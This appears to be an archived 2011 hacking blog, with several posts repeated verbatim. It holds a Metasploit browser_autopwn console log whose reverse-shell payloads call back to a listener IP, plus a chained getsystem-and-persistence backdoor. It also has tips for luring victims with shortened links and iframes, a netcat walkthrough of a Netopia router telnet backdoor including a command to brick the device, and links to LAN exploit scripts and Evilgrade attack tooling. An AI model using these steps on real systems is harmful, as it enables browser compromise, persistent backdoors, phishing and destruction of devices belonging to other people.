Browser Autopwn and Post Exploitation Automation
In this post I simply show how you can leverage Metasploits Browser Autopwn feature and post-exploit automation to make your pwnage more efficient.
I will simply post a text-log for now of the console session... I will, at the bottom, show all the commands executed and explain why/what they do.
########
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.0.0-testing [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 360 auxiliary - 70 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13406 updated yesterday (2011.07.29)
msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set LHOST 140.203.213.173
LHOST => 140.203.213.173
msf auxiliary(browser_autopwn) > show advanced
Module advanced options:
Name : AutoRunScript
Current Setting:
Description : A script to automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : DEBUG
Current Setting: false
Description : Do not obfuscate the javascript and print various bits of useful
info to the browser
Name : EXCLUDE
Current Setting:
Description : Only attempt to use exploits whose name DOES NOT match this
regex
Name : InitialAutoRunScript
Current Setting: migrate -f
Description : An initial script to run on session created (before
AutoRunScript)
Name : LPORT_GENERIC
Current Setting: 6666
Description : The port to use for generic reverse-connect payloads
Name : LPORT_JAVA
Current Setting: 7777
Description : The port to use for Java reverse-connect payloads
Name : LPORT_LINUX
Current Setting: 4444
Description : The port to use for Linux reverse-connect payloads
Name : LPORT_MACOS
Current Setting: 5555
Description : The port to use for Mac reverse-connect payloads
Name : LPORT_WIN32
Current Setting: 3333
Description : The port to use for Windows reverse-connect payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : MATCH
Current Setting:
Description : Only attempt to use exploits whose name matches this regex
Name : PAYLOAD_GENERIC
Current Setting: generic/shell_reverse_tcp
Description : The payload to use for generic reverse-connect payloads6
Name : PAYLOAD_JAVA
Current Setting: java/meterpreter/reverse_tcp
Description : The payload to use for Java reverse-connect payloads
Name : PAYLOAD_LINUX
Current Setting: linux/meterpreter/reverse_tcp
Description : The payload to use for Linux reverse-connect payloads
Name : PAYLOAD_MACOS
Current Setting: osx/meterpreter/reverse_tcp
Description : The payload to use for Mac reverse-connect payloads
Name : PAYLOAD_WIN32
Current Setting: windows/meterpreter/reverse_tcp
Description : The payload to use for Windows reverse-connect payloads
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf auxiliary(browser_autopwn) > set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
autorunscript => use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2011-07-31 16:46:01 +0100
msf auxiliary(browser_autopwn) > [*] Done in 4.250804937 seconds
[*] Starting exploit modules on host 140.203.213.173...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/olNIWYBO
[*] Local IP: http://140.203.213.173:80/olNIWYBO
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MJRGMyJeIZ
[*] Local IP: http://140.203.213.173:80/MJRGMyJeIZ
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/tgeUOMS
[*] Local IP: http://140.203.213.173:80/tgeUOMS
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/hHgo
[*] Local IP: http://140.203.213.173:80/hHgo
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/vgsBT
[*] Local IP: http://140.203.213.173:80/vgsBT
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/lBSv
[*] Local IP: http://140.203.213.173:80/lBSv
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/WSwQ
[*] Local IP: http://140.203.213.173:80/WSwQ
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/LaCtIRmKFgjC
[*] Local IP: http://140.203.213.173:80/LaCtIRmKFgjC
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/YDmj
[*] Local IP: http://140.203.213.173:80/YDmj
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/OhNdpjvw
[*] Local IP: http://140.203.213.173:80/OhNdpjvw
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/gBDljyzASUIE
[*] Local IP: http://140.203.213.173:80/gBDljyzASUIE
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uWVoWM
[*] Local IP: http://140.203.213.173:80/uWVoWM
[*] Server started.
[*] Using URL: http://0.0.0.0:80/cCeAI
[*] Local IP: http://140.203.213.173:80/cCeAI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oMMWLifmjN
[*] Local IP: http://140.203.213.173:80/oMMWLifmjN
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/olsZbkWuHiC
[*] Local IP: http://140.203.213.173:80/olsZbkWuHiC
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VJwjFpawhrII
[*] Local IP: http://140.203.213.173:80/VJwjFpawhrII
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/vPSnVmSgq
[*] Local IP: http://140.203.213.173:80/vPSnVmSgq
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KamK
[*] Local IP: http://140.203.213.173:80/KamK
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kQfuNvwQvRfF
[*] Local IP: http://140.203.213.173:80/kQfuNvwQvRfF
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/eJDSgMe
[*] Local IP: http://140.203.213.173:80/eJDSgMe
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/yUgUbxfOz
[*] Local IP: http://140.203.213.173:80/yUgUbxfOz
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/FJULEockuokO
[*] Local IP: http://140.203.213.173:80/FJULEockuokO
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 140.203.213.173:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 140.203.213.173:6666
[*] Starting the payload handler...
[*] Started reverse handler on 140.203.213.173:7777
[*] Starting the payload handler...
[*] --- Done, found 22 exploit modules
[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*] Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
No active sessions.
msf auxiliary(browser_autopwn) >
########
"setg payload windows/meterpreter/reverse_tcp"
> This command simply sets the global variable for payload as Windows Meterpreter where applicable.
"use server/browser_autopwn"
> This is to "use" the browser autopwn method
"show options"
> This shows options for the specific module
"set SRVPORT 80"
> Sets the variable SRVPORT to 80, meaning the port the targets must connect to is 80.
"set LHOST 140.203.213.173"
> Sets the IP address for back-connects to 140.203.213.173. Set this to your listener - normally the one started by metasploit, i.e. YOU.
"show advanced"
> Shows advanced options for the module
"set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173"
> This is my own little mixin. It runs three commands one after another.
>> First, it loads the "priv" plugin, so it can prepare to escalate privilages on pwned systems.
>>> Next it runs getsystem whilch escalates privilages to SYSTEM
>>>> Finally, it sets Meterpreter as Persistant Post Reboot. I explain the flags below.
>>>>> -U means it runs the Meterpreter Persistant Backdoor on User Login
>>>>>> -i 5 means it sleeps 5 seconds between reconnect retries. I set this to a big number if theres an IDS.
>>>>>>> -p 6666 is the port to connect back to where a Multi/handler is listening
>>>>>>>> -r 140.203.213.173 is the IP to connect back to.
PROTIP: Set up Metasploit on a VPS and run multi/handler on 443 so the backdoors connect back to that. 443 is good for firewall bypassing.
"run"
> This command runs the module!
"sessions -l"
> this command lists created meterpreter/shell sessions
"sessions -i 1" (not used here)
> Interact with session 1. -i <number of session> means interact with session <number>.
Once you set it up, a nasty trick is to send the link (IP:Port of server) as a tinyurl encoded link to people, so they get pwned rather swiftly. Or embed the link as an iFrame with onload into a malicious website for spear phishing...
Have fun.
~For informational and educational purposes only, I am not responsible for your use of this infodox. Dont be malicious... Its mean!
Sunday 31 July 2011
Saturday 30 July 2011
Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilage escalation"
Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilage escalation".
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Un protected administrative provilages
> Privilage escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the accessing and privilage escalation, I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
�� �� ��
Terminal shell v1.0
Copyright �2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
~ This info is for educational and academic and such non evil uses only.
I aint responsible for your misdeeds.
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Un protected administrative provilages
> Privilage escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the accessing and privilage escalation, I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
�� �� ��
Terminal shell v1.0
Copyright �2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
~ This info is for educational and academic and such non evil uses only.
I aint responsible for your misdeeds.
Ch0mpy-LAN - New Tool Release
New tool release - Ch0mpy-LAN
This tool is my lame attempt at halfheartedly scripting up a method to automate some attacks using Evilgrade, Metasploit, and Fast-Track over LAN.
Later I will recode the whole thing in python with a far more useable UI, but for now it is just proof of concept, etc, because quite frankly I am a bit lazy.
To use it, unpack the ZIP (RAR was being a fucker) file in a directory of your choice and check is the stuff in /bin/evilGrade.sh right - i.e. path to your backdoor, path to evilgrade folder.
It was written with BackTrack 5 in mind using the tweaks I outlined in a previoius blog post.
Just chmod +x the shell script and run the perl script, its fairly self explanitory...
Have fun :)
~oh, I take NO responsibility for malicious use of ANY of my tools.
Your fault if you do something stupid.
DOWNLOAD: http://dl.dropbox.com/u/36983782/ch0mpy-lan.zip
This tool is my lame attempt at halfheartedly scripting up a method to automate some attacks using Evilgrade, Metasploit, and Fast-Track over LAN.
Later I will recode the whole thing in python with a far more useable UI, but for now it is just proof of concept, etc, because quite frankly I am a bit lazy.
To use it, unpack the ZIP (RAR was being a fucker) file in a directory of your choice and check is the stuff in /bin/evilGrade.sh right - i.e. path to your backdoor, path to evilgrade folder.
It was written with BackTrack 5 in mind using the tweaks I outlined in a previoius blog post.
Just chmod +x the shell script and run the perl script, its fairly self explanitory...
Have fun :)
~oh, I take NO responsibility for malicious use of ANY of my tools.
Your fault if you do something stupid.
DOWNLOAD: http://dl.dropbox.com/u/36983782/ch0mpy-lan.zip
Bobby_Tables.py - A rapid MySQL database extraction utility.
Ok, here goes. This is bobby_tables.py, a script designed to rapidly enumerate tables and dump them to .cvs files.
It was task specific as a challenge in automation when it was written a long time ago, but after that development was discontinued.
I reckon poor Bobby here deserves another chance!
This is the newer version, I will edit this post later to include an older variant of the script. Just edit it as per the comments and python bobby_tables.py for winning!
http://pastebin.com/raw.php?i=SN1hxs4z <--- SOURCE CODE
Enjoy and use responsibly.
Friday 29 July 2011
Quick script for metasploit exploitation over LAN of a few microsoft vulns...
This is a quick perl script that allows you to fire a few exploits (with the meterpreter bindshell payload) to exploit the following microsoft vulnerabilities...
MS-08-067
MS-10-061
MS-03-026
MS-04-031
MS-07-029
Link to script (fuckms.pl)
http://pastebin.com/raw.php?i=8pw4Z6Dz
Some infodox about the exploits...
MS-08-067 Netapi exploit
> Used by Conficker to spread, later used by Stuxnet...
> http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
MS-10-061 Spoolss Exploit
> Used by Stuxnet to spread, originally thought to be 0day but was not...
> http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx
MS-03-026
> http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx
> An old exploit... good though :)
MS-04-031
> http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
> Worth a try... Sometimes.
MS-07-029
> http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
> Never had a chance to test it :(
So, if you have any input/feedback/complaints, hit me with em :)
MS-08-067
MS-10-061
MS-03-026
MS-04-031
MS-07-029
Link to script (fuckms.pl)
http://pastebin.com/raw.php?i=8pw4Z6Dz
Some infodox about the exploits...
MS-08-067 Netapi exploit
> Used by Conficker to spread, later used by Stuxnet...
> http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
MS-10-061 Spoolss Exploit
> Used by Stuxnet to spread, originally thought to be 0day but was not...
> http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx
MS-03-026
> http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx
> An old exploit... good though :)
MS-04-031
> http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
> Worth a try... Sometimes.
MS-07-029
> http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
> Never had a chance to test it :(
So, if you have any input/feedback/complaints, hit me with em :)
Tweaking BackTrack 5 for maximum effectiveness.
Ok, so you downloaded BackTrack 5. As did 9001 other security-interested people, ranging from script kiddies to professional pentesters and equally professional blackhats.
The first thing you notice is, it is *not* perfect. Fast-Track is half broken by the updated MetaSploit Framework, and some tools are just plain missing.
## Updating, adding tools.
In fact, some people preferred Gnack-Track, which is now End-of-Lifed thanks to the shiny new GNOME BackTrack for those of us who despise the Fisher-Price interfaces of KDE.
So, first off, we run apt-get update && apt-get upgrade to install any nice new "fixes" that the team has come up with.
Next, if you miss some of the stuff from the GnackTrack system, or just want to update and add more awesomeness, go here for the BT5-fix script that "fixes" some things and adds others...
https://www.phillips321.co.uk/bt5-fixit-sh/
So now we have updated a bunch of stuff, installed new tools, but what next?
Ever notice how much of a pain in the ass it is that every time you load BT5 you spend a moment starting WICD daemon so you can connect to wireless networks?
## Adding WICD to init.d
root@bt:~# cd /etc/init.d/
root@bt:/etc/init.d/# gedit
Now save the following shell script as "wicdstarter.sh" in /etc/init.d/.
#!/bin/bash
# startup script for WICD daemon
# starts wicd
echo "[+] STARTING WICD"
/etc/init.d/wicd start
echo "[+] WICD INITIATED"
Now run the following command: "update-rc.d wicdstarter.sh defaults"
Followed by "chmod +x wicdstarter.sh"
That adds the Wicd Start script to init.d, saving you 0.5 seconds of your day.
## Fixing Fast-Track.
Now Fast-Tracks DB-Autopwn Automation seems to fail miserably since the update to MSF, so let me refer you to Zero Colds website for the fix he came up with.
http://zerocold.co.uk/?p=801
It works fine and now those of you who use that feature have it.
Also, check out his fine guide to NeXpose Installation on BT5 and MSF NeXpose Integration...
http://zerocold.co.uk/?p=840
## Adding ZeroColds Meterpreter Scripts for Post Exploitation.
http://forum.intern0t.net/other-programming-languages/2121-installer-sh.html
That "installer script" should install all his goodies. Let me see if it works (doing all this as I type)
Ok, it needs modification to function correctly. LETS MOD!
Modified code ---> http://pastebin.com/raw.php?i=iYRZSra9
Now I see the use for SOME of the scripts, others I am not so sure about. Though I reckon they are somewhat useful in a pentest to prove the amount of power one can have over a compromised system...
## Wi-fEye Fixing and Installation (and installing evilgrade + hamester)
Hamster and Ferret installation...
I put the Hamster-2.0.0 zip file in /root/work while I worked on it.
root@bt:~/work# unzip hamster-2.0.0.zip
root@bt:~/work# cd hamster
root@bt:~/work/hamster# cd build
root@bt:~/work/hamster/build# cd gcc4
root@bt:~/work/hamster/build/gcc4# make
root@bt:~/work/hamster/build/gcc4# cd ..
root@bt:~/work/hamster/build# cd ..
root@bt:~/work/hamster# cd ..
root@bt:~/work# cd ferret
root@bt:~/work/ferret# cd build
root@bt:~/work/ferret/build# cd gcc4
root@bt:~/work/ferret/build/gcc4# make
root@bt:~/work/ferret/build/gcc4# cd ..
root@bt:~/work/ferret/build# cd ..
root@bt:~/work/ferret# cd bin
root@bt:~/work/ferret/bin# mv ferret ~/work/hamster/bin/
root@bt:~/work/ferret/bin# cd ~/work
root@bt:~/work# mv hamster /pentest
DONE!
That is Hamster and Ferret installed in /pentest/hamster/ where Wi-fEye can use them!
###
Now lets install evilgrade-ng...
First run "apt-get install expect" to install the wierd dependancies.
Now we are back in the work directory and this is very easy.
root@bt:~/work# tar -xf isr-evilgrade-2.0.0.tar.gz
root@bt:~/work# mv isr-evilgrade evilgrade
root@bt:~/work# mv evilgrade /opt
Now it gets a bit harder. "WHY WONT IT FUCKING RUN!" is a common cry I hear.
It is because we need the Data::Dump perl module, which I will now show you how to install using the CPAN shell...
root@bt:~/work# cpan
Now it will ask a buttload of questions to which I just say "yes" lol
cpan[1]> install Data::Dump
I promptly get a load of output. I just say yes, again, to any options.
Once it is done doing "lots of shit" just type exit then you can run Evilgrade
Now lets install Wi-fEye...
###
Wi-fEye installation!
root@bt:~/work# tar -xf Wi-fEye-v0.5.6.tar.gz
root@bt:~/work# cd Wi-fEye-v0.5.6
root@bt:~/work/Wi-fEye-v0.5.6# gedit Wi-fEye.py
Now check that the infodox is correct... as in the paths - to things. It should be...
http://wi-feye.za1d.com/Documentation.html <--- better Wi-fEye infodox there!
Also download Wi-fEye from there
Download Evilgrade-ng here
http://www.infobyte.com.ar/developments.html
I cannot find a good Hamester download for the life of me so here is one
http://www.mediafire.com/?8486i3frg82wo11
http://dl.dropbox.com/u/36983782/hamster-2.0.0.zip
YOUTUBE VIDEO NOW ADDED!
Enjoy...
The first thing you notice is, it is *not* perfect. Fast-Track is half broken by the updated MetaSploit Framework, and some tools are just plain missing.
## Updating, adding tools.
In fact, some people preferred Gnack-Track, which is now End-of-Lifed thanks to the shiny new GNOME BackTrack for those of us who despise the Fisher-Price interfaces of KDE.
So, first off, we run apt-get update && apt-get upgrade to install any nice new "fixes" that the team has come up with.
Next, if you miss some of the stuff from the GnackTrack system, or just want to update and add more awesomeness, go here for the BT5-fix script that "fixes" some things and adds others...
https://www.phillips321.co.uk/bt5-fixit-sh/
So now we have updated a bunch of stuff, installed new tools, but what next?
Ever notice how much of a pain in the ass it is that every time you load BT5 you spend a moment starting WICD daemon so you can connect to wireless networks?
## Adding WICD to init.d
root@bt:~# cd /etc/init.d/
root@bt:/etc/init.d/# gedit
Now save the following shell script as "wicdstarter.sh" in /etc/init.d/.
#!/bin/bash
# startup script for WICD daemon
# starts wicd
echo "[+] STARTING WICD"
/etc/init.d/wicd start
echo "[+] WICD INITIATED"
Now run the following command: "update-rc.d wicdstarter.sh defaults"
Followed by "chmod +x wicdstarter.sh"
That adds the Wicd Start script to init.d, saving you 0.5 seconds of your day.
## Fixing Fast-Track.
Now Fast-Tracks DB-Autopwn Automation seems to fail miserably since the update to MSF, so let me refer you to Zero Colds website for the fix he came up with.
http://zerocold.co.uk/?p=801
It works fine and now those of you who use that feature have it.
Also, check out his fine guide to NeXpose Installation on BT5 and MSF NeXpose Integration...
http://zerocold.co.uk/?p=840
## Adding ZeroColds Meterpreter Scripts for Post Exploitation.
http://forum.intern0t.net/other-programming-languages/2121-installer-sh.html
That "installer script" should install all his goodies. Let me see if it works (doing all this as I type)
Ok, it needs modification to function correctly. LETS MOD!
Modified code ---> http://pastebin.com/raw.php?i=iYRZSra9
Now I see the use for SOME of the scripts, others I am not so sure about. Though I reckon they are somewhat useful in a pentest to prove the amount of power one can have over a compromised system...
## Wi-fEye Fixing and Installation (and installing evilgrade + hamester)
Hamster and Ferret installation...
I put the Hamster-2.0.0 zip file in /root/work while I worked on it.
root@bt:~/work# unzip hamster-2.0.0.zip
root@bt:~/work# cd hamster
root@bt:~/work/hamster# cd build
root@bt:~/work/hamster/build# cd gcc4
root@bt:~/work/hamster/build/gcc4# make
root@bt:~/work/hamster/build/gcc4# cd ..
root@bt:~/work/hamster/build# cd ..
root@bt:~/work/hamster# cd ..
root@bt:~/work# cd ferret
root@bt:~/work/ferret# cd build
root@bt:~/work/ferret/build# cd gcc4
root@bt:~/work/ferret/build/gcc4# make
root@bt:~/work/ferret/build/gcc4# cd ..
root@bt:~/work/ferret/build# cd ..
root@bt:~/work/ferret# cd bin
root@bt:~/work/ferret/bin# mv ferret ~/work/hamster/bin/
root@bt:~/work/ferret/bin# cd ~/work
root@bt:~/work# mv hamster /pentest
DONE!
That is Hamster and Ferret installed in /pentest/hamster/ where Wi-fEye can use them!
###
Now lets install evilgrade-ng...
First run "apt-get install expect" to install the wierd dependancies.
Now we are back in the work directory and this is very easy.
root@bt:~/work# tar -xf isr-evilgrade-2.0.0.tar.gz
root@bt:~/work# mv isr-evilgrade evilgrade
root@bt:~/work# mv evilgrade /opt
Now it gets a bit harder. "WHY WONT IT FUCKING RUN!" is a common cry I hear.
It is because we need the Data::Dump perl module, which I will now show you how to install using the CPAN shell...
root@bt:~/work# cpan
Now it will ask a buttload of questions to which I just say "yes" lol
cpan[1]> install Data::Dump
I promptly get a load of output. I just say yes, again, to any options.
Once it is done doing "lots of shit" just type exit then you can run Evilgrade
Now lets install Wi-fEye...
###
Wi-fEye installation!
root@bt:~/work# tar -xf Wi-fEye-v0.5.6.tar.gz
root@bt:~/work# cd Wi-fEye-v0.5.6
root@bt:~/work/Wi-fEye-v0.5.6# gedit Wi-fEye.py
Now check that the infodox is correct... as in the paths - to things. It should be...
http://wi-feye.za1d.com/Documentation.html <--- better Wi-fEye infodox there!
Also download Wi-fEye from there
Download Evilgrade-ng here
http://www.infobyte.com.ar/developments.html
I cannot find a good Hamester download for the life of me so here is one
http://www.mediafire.com/?8486i3frg82wo11
http://dl.dropbox.com/u/36983782/hamster-2.0.0.zip
YOUTUBE VIDEO NOW ADDED!
Enjoy...
Subscribe to:
Posts (Atom)